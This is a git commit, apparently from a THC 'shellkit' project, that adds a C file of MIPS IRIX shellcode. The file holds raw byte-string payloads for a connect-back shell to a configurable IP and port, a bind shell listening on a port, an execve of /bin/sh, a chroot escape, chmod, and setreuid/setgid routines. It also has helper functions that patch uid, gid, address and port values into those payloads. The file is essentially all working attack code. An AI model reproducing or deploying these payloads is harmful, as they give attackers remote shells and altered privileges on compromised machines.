From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/mips_irix.c | 231 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 231 insertions(+) create mode 100644 other/shellkit/mips_irix.c (limited to 'other/shellkit/mips_irix.c') diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c new file mode 100644 index 0000000..33bf38c --- /dev/null +++ b/other/shellkit/mips_irix.c @@ -0,0 +1,231 @@ + +#include +#include +#include +#include "shellcode.h" +#include "mips.h" + + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_chmod = { + "mips-irix-chmod", + 64, + "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55" + /* ^^ ^^ = uid ^ 0x5555 */ + "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80" + /* ^^ ^^ = gid ^ 0x5555 */ + "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8" + /* ^^ ^^ = length of appended pathname + 0xfeb8 */ + "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7" + "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c" + "\x24\x18\x72\xec", +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_chroot = { + "mips-irix-chroot", + 84, + "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e" + "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0" + "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c" + "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11" + "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c" + "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26" + "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50", +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_connectsh = { + "mips-irix-connectsh", + 172, + "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" + "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" + "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" + "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42" + /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */ + "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8" + /* ^^ ^^ ip .3.4 */ + "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23" + "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2" + "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee" + "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff" + "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c" + "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc" + "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20" + "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8" + "\x24\x02\x04\x23\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_execvesh = { + "mips-irix-execvesh", + 48, + "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc" + "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" + "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23" + "\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +shellcode mips_irix_exit = { + "mips-irix-exit", + 16, + "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c" + "\x24\x18\x73\x50", +}; + +/* tested on: IP20 R4000 6.5 + * IP30 R10000 6.5.7m (thanks oxigen ;) + */ +shellcode mips_irix_portshellsh = { + "mips-irix-portshellsh", + 188, /* yay! well optimized */ + "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" + "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" + "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" + "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */ + "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0" + "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c" + "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec" + "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c" + "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03" + "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff" + "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26" + "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6" + "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8" + "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" + "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_read = { + "mips-irix-read", + 56, + "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31" + "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb" + "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10" + "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f" + "\x01\x01\x01\x0c\x24\x18\x73\x50", +}; + +shellcode mips_irix_setgid = { + "mips-irix-setgid", + 16, + "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */ + "\x01\x01\x01\x0c", +}; + +shellcode mips_irix_setreuid = { + "mips-irix-setreuid", + 24, + "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55" + /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */ + "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c", +}; + + +shellcode * mips_irix_shellcodes[] = { + &mips_irix_chmod, + &mips_irix_chroot, + &mips_irix_connectsh, + &mips_irix_execvesh, + &mips_irix_exit, + &mips_irix_portshellsh, + &mips_irix_read, + &mips_irix_setgid, + &mips_irix_setreuid, + NULL, +}; + + +arch mips_irix = { + "mips-irix", + 4, + mips_nop, + mips_irix_shellcodes, +}; + + + +/* set the uid, gid and pathname of the mips-irix-chmod code at `code' + * XXX: be sure to have strlen(pathname) bytes left after code + */ +void +mips_irix_chmod_setup (unsigned char *code, char *pathname, + unsigned short int uid, unsigned short int gid) +{ + unsigned short int len = 0xfeb8; + + uid ^= 0x5555; + code[6] = (uid >> 8) & 0xff; + code[7] = uid & 0xff; + + gid ^= 0x5555; + code[14] = (gid >> 8) & 0xff; + code[15] = gid & 0xff; + + len += strlen (pathname); + code[26] = (len >> 8) & 0xff; + code[27] = len & 0xff; + + memcpy (code + 64, pathname, strlen (pathname)); + + return; +} + + +/* ip and port in network byte order + */ +void +mips_irix_connectsh_setup (unsigned char *code, + unsigned long int ip, unsigned short int port) +{ + code[38] = (port >> 8) & 0xff; + code[39] = port & 0xff; + + code[46] = (ip >> 24) & 0xff; + code[47] = (ip >> 16) & 0xff; + code[50] = (ip >> 8) & 0xff; + code[51] = ip & 0xff; + + return; +} + + +/* set the gid within the 'mips-irix-setgid' code at `code' + */ +void +mips_irix_setgid_setup (unsigned char *code, unsigned short int gid) +{ + gid ^= 0x5555; + + code[2] = (gid >> 8) & 0xff; + code[3] = gid & 0xff; + + return; +} + + +void +mips_irix_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid) +{ + ruid ^= 0x5555; + code[2] = (ruid >> 8) & 0xff; + code[3] = ruid & 0xff; + + euid ^= 0x5555; + code[6] = (euid >> 8) & 0xff; + code[7] = euid & 0xff; + + return; +} + + -- cgit v1.3